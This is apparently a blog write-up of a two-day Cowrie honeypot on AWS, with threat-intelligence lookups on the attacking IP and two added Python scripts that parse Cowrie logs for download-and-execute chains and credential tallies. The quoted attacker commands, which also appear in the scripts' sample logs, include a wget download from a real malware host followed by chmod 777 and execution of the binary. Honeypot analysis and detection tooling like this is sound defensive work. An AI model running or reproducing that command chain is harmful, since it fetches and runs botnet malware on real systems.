The Two Day Cowrie Honeypot

I was tasked with starting up a honeypot using Amazon Web Services (AWS). I left the Cowrie honeypot online for about two days and saved the data into my Elastic dashboard for further threat analysis. One IP got my attention since the network host was FranTech Solutions.

___________________________________________________________________

Commands Used by IP (Repeated Three Times)

./x86_64 x86xhed

cat /etc/issue

cd /tmp/

wget http://194.85.249.86/x86_64

chmod 777 *

./x86_64 x86xhed

-Commands the attacker IP used-

___________________________________________________________________

Looking At What The Commands Do

For some reason the first command that is run seems to be executing a file that is not on the computer yet. I’ve tried running this file in the tmp folder, which I’m assuming is where it’s supposed to be, based on the following commands.

Now for the next command, I didn’t know what it meant even after using it in the command line. I went on the internet and this is what I found. It seems that using the cat command on /etc/issue displays a welcome and/or warning line to ssh users when logging in.

The next command changes into the tmp directory, presumably to download malware there, which is exactly what happens next.

The IP address 194.85.249.86 is the web server that the file is fetched from using the command wget, which downloads content from web servers.

After the file is downloaded, the permissions are changed to allow read, write and execute access to all users. After that, the downloaded file is executed.
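As an added example (not from the original post), the command chain above can be pulled straight out of Cowrie’s JSON log instead of being read off the dashboard. The script below parses Cowrie’s newline-delimited `cowrie.command.input` events, groups them per session, extracts the URLs fetched by wget/curl style commands, and flags the download → chmod → execute pattern so the dropped file name and hosting IP fall out as indicators. The log lines are constructed here to mirror the post’s command list; the session id, timestamps and the attacker address 203.0.113.10 are made-up placeholders.

```python
import json
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample of Cowrie JSON log lines (cowrie.json format), modelled on the
# command chain in the post. Session id, timestamp and src_ip are placeholders.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.10", "session": "a1b2c3d4", "timestamp": "2024-01-01T00:00:00Z"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.10", "session": "a1b2c3d4", "username": "root", "password": "123456"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "session": "a1b2c3d4", "input": "./x86_64 x86xhed"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "session": "a1b2c3d4", "input": "cat /etc/issue"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "session": "a1b2c3d4", "input": "cd /tmp/"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "session": "a1b2c3d4", "input": "wget http://194.85.249.86/x86_64"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "session": "a1b2c3d4", "input": "chmod 777 *"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "session": "a1b2c3d4", "input": "./x86_64 x86xhed"}
"""

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Commands an attacker typically uses to pull a payload onto the box.
DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")


def parse_cowrie(text):
    """Parse newline-delimited Cowrie JSON, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a truncated line should not abort the whole analysis
    return events


def commands_by_session(events):
    """Group cowrie.command.input events into an ordered command list per session."""
    sessions = defaultdict(lambda: {"src_ip": None, "commands": []})
    for ev in events:
        if ev.get("eventid") != "cowrie.command.input":
            continue
        entry = sessions[ev["session"]]
        entry["src_ip"] = ev.get("src_ip")
        entry["commands"].append(ev["input"])
    return dict(sessions)


def download_urls(commands):
    """URLs fetched by wget/curl style commands, in the order they appear."""
    urls = []
    for cmd in commands:
        parts = cmd.split()
        if parts and parts[0] in DOWNLOADERS:
            urls.extend(URL_RE.findall(cmd))
    return urls


def dropped_file_names(urls):
    """Last path component of each URL, i.e. the name the file lands under."""
    return [urlparse(u).path.rsplit("/", 1)[-1] for u in urls]


def download_execute_chain(commands):
    """Detect download -> chmod -> execute of the downloaded file.

    Returns the executed dropped file name, or None when the chain is incomplete.
    Execution of a file *before* any download (the first line in the post) is ignored.
    """
    names = {n for n in dropped_file_names(download_urls(commands)) if n}
    downloaded = False
    chmodded = False
    for cmd in commands:
        parts = cmd.split()
        if not parts:
            continue
        if parts[0] in DOWNLOADERS and URL_RE.search(cmd):
            downloaded, chmodded = True, False
        elif downloaded and parts[0] == "chmod":
            chmodded = True
        elif downloaded and chmodded and parts[0].startswith("./"):
            name = parts[0][2:]
            if name in names:
                return name
    return None


def session_reports(text):
    """One indicator summary per session: commands, download URLs, hosts, payload."""
    reports = {}
    for sid, entry in commands_by_session(parse_cowrie(text)).items():
        urls = download_urls(entry["commands"])
        reports[sid] = {
            "src_ip": entry["src_ip"],
            "commands": entry["commands"],
            "download_urls": urls,
            "download_hosts": sorted({urlparse(u).hostname for u in urls}),
            "executed_payload": download_execute_chain(entry["commands"]),
        }
    return reports


if __name__ == "__main__":
    for sid, rep in session_reports(SAMPLE_LOG).items():
        print(sid, json.dumps(rep, indent=2))
```

The `download_hosts` and `executed_payload` fields are the two values worth feeding into the IP and file lookups described later in the post; the chain detector deliberately requires the executed name to match a downloaded file, so a stray `./something` that was never fetched does not produce a false positive.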

___________________________________________________________________

What I Found Researching the Attacker's IP

For this next section I will display the information I found on this IP through various websites, which I will of course provide the URLs for. I first started off with the research of the attacker's IP.

Clicking on the IP address in the dashboard brought me to this information page which gave me the origins of this IP. The location of the IP is in Las Vegas, United States. The network owner of this IP is FranTech Solutions which has some history hosting malware like the one I’ve encountered. The email reputation is poor, so from that I can assume emails from this IP are usually meant to harm the receiver.

-Locational and network owner for attack IP-

The location data coming from Las Vegas makes sense. Las Vegas is a very good place to host data servers; from what the web says, “Las Vegas is the #1 Safest City From Natural Disasters in the USA”.

-IPs on the same subnet-
-Blocklist from the dashboard-
-The website is abuseipdb-

This was a nice find for me because this in the beginning solidified that this was a dangerous IP, which of course is expected. Still, having solid evidence like this is great.

-Went to a website called VirusTotal and it gave me evidence that this IP was malware-
-Brightcloud threat analysis-

Brightcloud gave me confirmation that this IP was trying to host a botnet, which is typical for what a honeypot sees. Though this was expected, it’s still good to have backing evidence.

-A line and bar graph of attacks from IP-
-Ports and reaffirmed location data, this also shows this IP was using SSH-
-The location of where the attacks generalize-

The information above shows that the attacks are coming from the middle of California. This is actually very near the network host location, which is Las Vegas.

-Usernames and passwords used-

This screenshot was taken from the dashboard section of Elastic. It shows the usernames and passwords used by the attacker IP to try to log in to the honeypot, all of which failed. The larger a credential appears, the more often the attacker tried it. As you can see, “root” as the username was used the most, because if they somehow logged in as root they would have access to just about everything.
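As an added example (not part of the original post), the same tally the dashboard draws as a tag cloud can be computed directly from Cowrie’s `cowrie.login.failed` and `cowrie.login.success` events. The script below filters the log to one source IP, counts usernames, passwords and username/password pairs, and separates any successful logins so the credential that finally worked is visible next to the guesses that preceded it. The log lines are constructed; the addresses 203.0.113.10 and 198.51.100.7 and the session ids are placeholders.

```python
import json
from collections import Counter

# Constructed Cowrie login events; src_ip values and session ids are placeholders.
SAMPLE_LOGINS = """\
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.10", "session": "s1", "username": "root", "password": "123456"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.10", "session": "s2", "username": "root", "password": "admin"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.10", "session": "s3", "username": "root", "password": "123456"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.10", "session": "s4", "username": "admin", "password": "admin"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.7", "session": "s5", "username": "pi", "password": "raspberry"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.10", "session": "s6", "username": "root", "password": "123456"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "session": "s6", "input": "cat /etc/issue"}
"""

LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}


def login_events(text, src_ip=None):
    """Yield login attempt events, optionally restricted to one source IP."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("eventid") not in LOGIN_EVENTS:
            continue
        if src_ip is not None and ev.get("src_ip") != src_ip:
            continue
        yield ev


def credential_tally(text, src_ip=None):
    """Count usernames, passwords and (username, password) pairs tried by an IP.

    Successful logins are counted as attempts too, and also listed separately so
    the working credential can be compared against the failed guesses before it.
    """
    usernames, passwords, pairs = Counter(), Counter(), Counter()
    successes = []
    sessions = set()
    for ev in login_events(text, src_ip):
        pair = (ev["username"], ev["password"])
        usernames[ev["username"]] += 1
        passwords[ev["password"]] += 1
        pairs[pair] += 1
        sessions.add(ev["session"])
        if ev["eventid"] == "cowrie.login.success":
            successes.append(pair)
    return {
        "attempts": sum(pairs.values()),
        "sessions": len(sessions),
        "usernames": usernames,
        "passwords": passwords,
        "pairs": pairs,
        "successes": successes,
    }


def describe(tally, top_n=5):
    """Human-readable lines in the spirit of the dashboard tag cloud."""
    lines = [f"{tally['attempts']} attempts over {tally['sessions']} sessions"]
    for label, counter in (("usernames", tally["usernames"]), ("passwords", tally["passwords"])):
        ranked = ", ".join(f"{v}×{n}" for v, n in counter.most_common(top_n))
        lines.append(f"top {label}: {ranked}")
    for user, pw in tally["successes"]:
        lines.append(f"SUCCESS {user}:{pw} (tried {tally['pairs'][(user, pw)]} times in total)")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(credential_tally(SAMPLE_LOGINS, src_ip="203.0.113.10"))))
```

Filtering on `src_ip` is what turns a noisy global tally into the per-attacker view shown in the screenshot; dropping the filter gives the honeypot-wide picture, which is the better baseline for deciding which usernames are worth a dedicated detection rule.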

-Blacklist status from the website Ipvoid-

This site is called ipvoid.com. This website lets you input an IP address to look up and then displays the details in this table format. The blacklist status says that it is 20/115, the blacklists being DNS-based blacklists (DNSBL).

___________________________________________________________________

What I Found From the Wget IP

This is the information that I found while doing some research on the IP that I found in the command line.

-A reminder of the command-
-Using virustotal again, I found three alerts labeling this IP as malware-
-Additional information from abuseipdb-
-IPs on the same subnet-
-Locational and network owner-

This screenshot shows the related host and IP. This one also has a poor email reputation, which isn’t too surprising considering it is the host the wget command downloads the malware from. Strangely enough this IP draws its origins from Germany of all places. I’d think it would originate from the US because that’s where the host is.

-Using the website brightcloud showed there was no threat-

Using the website Brightcloud showed me, strangely enough, that there is no threat found on the wget IP, despite other sources saying that this IP is in fact dangerous.

-Blacklist status data from Ipvoid-

From using the same website as before I was able to see that this IP (unsurprisingly) is blacklisted. Not as many blacklists as the previous query, but blacklisted nonetheless.
